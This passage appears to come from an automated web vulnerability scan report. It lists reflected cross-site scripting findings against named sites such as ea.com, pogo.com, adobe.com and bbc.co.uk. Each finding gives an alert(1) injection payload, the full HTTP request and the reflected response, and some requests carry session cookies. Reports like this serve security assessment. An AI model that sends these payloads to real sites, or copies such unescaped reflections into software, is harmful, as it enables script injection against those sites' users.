The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3960e</script><script>alert(1)</script>3ad9a7ed78b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /user/freshface3960e</script><script>alert(1)</script>3ad9a7ed78b/portfolio HTTP/1.1 Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sun, 09 Jan 2011 02:29:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 404 Not Found Content-Length: 20159 Set-Cookie: _fd_session=BAh7BjoPc2Vzc2lvbl9pZCIlZTYwMDA5ZmYwMTEwNjA5Y2RmOGQ2NjE1N2U4ZDhlYWQ%3D--1d2e8164d05571132baa11a7ea7b5a052b5d5deb; path=/; expires=Tue, 08-Jan-2013 14:29:00 GMT; HttpOnly Cache-Control: no-cache
(function() { var ga = document.createElement('script'); ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; g ...[SNIP]...
3.555. http://word-games.pogo.com/games/scrabble [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://word-games.pogo.com
Path:
/games/scrabble
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9434a"><script>alert(1)</script>13cdeb03797 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /games/scrabble?9434a"><script>alert(1)</script>13cdeb03797=1 HTTP/1.1 Host: word-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; op600clubpogogum=a00200200a2719m0337lk0d3e;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://word-games.pogo.com/games/scrabble?9434a"><script>alert(1)</script>13cdeb03797=1"/> ...[SNIP]...
3.556. http://word-games.pogo.com/games/scrabble [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://word-games.pogo.com
Path:
/games/scrabble
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12bcd"><a>1723ca1944 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble&12bcd"><a>1723ca1944=1 HTTP/1.1 Host: word-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://word-games.pogo.com/games/scrabble?12bcd"><a>1723ca1944=1"/> ...[SNIP]...
3.557. http://www.adobe.com/cfusion/marketplace/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.adobe.com
Path:
/cfusion/marketplace/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b21e3"style%3d"x%3aexpression(alert(1))"dd69221e281 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b21e3"style="x:expression(alert(1))"dd69221e281 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /cfusion/marketplace/index.cfm?event=marketplace.home&marketplaceid=1&b21e3"style%3d"x%3aexpression(alert(1))"dd69221e281=1 HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/x ...[SNIP]... <a href="/cfusion/marketplace/index.cfm?marketplaceid=1&b21e3"style="x:expression(alert(1))"dd69221e281=1&userid=&event=marketplace.offering&offeringid=19188" class="offeringFeatImg"> ...[SNIP]...
3.558. http://www.bbc.co.uk/news/technology-12126880 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbc.co.uk
Path:
/news/technology-12126880
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b916d'-alert(1)-'0e4cca645e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/technology-12126880?b916d'-alert(1)-'0e4cca645e6=1 HTTP/1.1 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.559. http://www.cmsinter.net/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cmsinter.net
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d83a2"><script>alert(1)</script>6e563bfa6d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?page_id=68&d83a2"><script>alert(1)</script>6e563bfa6d3=1 HTTP/1.1 Host: www.cmsinter.net Proxy-Connection: keep-alive Referer: http://www.cmsinter.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.1.10.1294526267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http:/ ...[SNIP]... <form action="/?page_id=68&d83a2"><script>alert(1)</script>6e563bfa6d3=1#wpcf7-f9-p68-o1" method="post" class="wpcf7-form"> ...[SNIP]...
3.560. http://www.e00.peanutlabs.com/js/iFrame/sc.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.e00.peanutlabs.com
Path:
/js/iFrame/sc.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26db1'%3balert(1)//c84884515e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26db1';alert(1)//c84884515e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the userId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bf13'%3balert(1)//5aebc85affc was submitted in the userId parameter. This input was echoed as 6bf13';alert(1)//5aebc85affc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63934"><script>alert(1)</script>2df1751bdc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hasbro63934"><script>alert(1)</script>2df1751bdc4 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:34 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=q1hu6pdtvde5o6ou1i8lmndgr0; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/hasbro63934"><script>alert(1)</script>2df1751bdc4" /> ...[SNIP]...
3.563. http://www.ea.com/hasbro [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/hasbro
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ee5"><script>alert(1)</script>fce1739ef22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hasbro?50ee5"><script>alert(1)</script>fce1739ef22=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:52 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=0l3r07fnbqfh2m49pvb96ndld3; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 70735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a href="http://www.digg.com/submit?url=http://www.ea.com/hasbro?50ee5"><script>alert(1)</script>fce1739ef22=1" class="digg-button"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6984"><script>alert(1)</script>80d93bc71a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ipade6984"><script>alert(1)</script>80d93bc71a5 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:19 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=q40if3obhassdl2f9hct64jt97; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/ipade6984"><script>alert(1)</script>80d93bc71a5" /> ...[SNIP]...
3.565. http://www.ea.com/ipad [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/ipad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a8a8"><script>alert(1)</script>a817042de2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ipad?7a8a8"><script>alert(1)</script>a817042de2e=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:04 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=0pkopsdhd3jhhkf5h4g2ag3fp6; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a href="http://www.digg.com/submit?url=http://www.ea.com/ipad?7a8a8"><script>alert(1)</script>a817042de2e=1" class="digg-button"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30d8"><script>alert(1)</script>b00c128a7a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iphonef30d8"><script>alert(1)</script>b00c128a7a2 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:29 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=2rji8o0i02qi8pf8eecrn0ktl2; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/iphonef30d8"><script>alert(1)</script>b00c128a7a2" /> ...[SNIP]...
3.567. http://www.ea.com/iphone [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ea.com
Path: /iphone
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5498"><script>alert(1)</script>98182c329e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iphone?e5498"><script>alert(1)</script>98182c329e3=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:04 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=c37dgtcd9v5so5qc2512oda4c2; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 75114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a href="http://www.digg.com/submit?url=http://www.ea.com/iphone?e5498"><script>alert(1)</script>98182c329e3=1" class="digg-button"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d069"><script>alert(1)</script>bc71c2e28ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mobile2d069"><script>alert(1)</script>bc71c2e28ae HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:48 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=5rkhii3l0etm09hgkiup7chbu6; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/mobile2d069"><script>alert(1)</script>bc71c2e28ae" /> ...[SNIP]...
3.569. http://www.ea.com/mobile [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ea.com
Path: /mobile
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b7f0"><script>alert(1)</script>1a57fea79e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mobile?4b7f0"><script>alert(1)</script>1a57fea79e6=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:11 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=f6h8smbmcc5eb4cfmc8shpdpp2; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 72033
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a href="http://www.digg.com/submit?url=http://www.ea.com/mobile?4b7f0"><script>alert(1)</script>1a57fea79e6=1" class="digg-button"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a510c"><script>alert(1)</script>768026e5947 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platforma510c"><script>alert(1)</script>768026e5947/online-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:15 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=r5uc24ode1odj7sfplf1so9lt6; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platforma510c"><script>alert(1)</script>768026e5947/online-games" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71d6"><script>alert(1)</script>afd7f39634c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/online-gamesc71d6"><script>alert(1)</script>afd7f39634c HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:19 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=hdhctndthgvreqj5oc72kovrd4; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31142
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform/online-gamesc71d6"><script>alert(1)</script>afd7f39634c" /> ...[SNIP]...
3.572. http://www.ea.com/platform/online-games [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ea.com
Path: /platform/online-games
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e979"><script>alert(1)</script>2cc600f9716 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/online-games?4e979"><script>alert(1)</script>2cc600f9716=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:54 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=3v32m4m525g1q6qqhm6uoqlng1; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68281
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/online-games?4e979"><script>alert(1)</script>2cc600f9716=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7daef"><script>alert(1)</script>8f7305031c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform7daef"><script>alert(1)</script>8f7305031c5/pc-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:08 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=dp5er2bnu8nk51e2hejgg8prt2; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31138
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform7daef"><script>alert(1)</script>8f7305031c5/pc-games" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978f0"><script>alert(1)</script>de071991f69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/pc-games978f0"><script>alert(1)</script>de071991f69 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:12 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=p115287m0igh5ha8rktkogt2l1; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31138
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform/pc-games978f0"><script>alert(1)</script>de071991f69" /> ...[SNIP]...
3.575. http://www.ea.com/platform/pc-games [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ea.com
Path: /platform/pc-games
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a13f"><script>alert(1)</script>4e0080deced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/pc-games?2a13f"><script>alert(1)</script>4e0080deced=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:38 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=i1srfdvvnrvksap1l2p9ivs9v3; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/pc-games?2a13f"><script>alert(1)</script>4e0080deced=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1666"><script>alert(1)</script>0c0acabc5be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
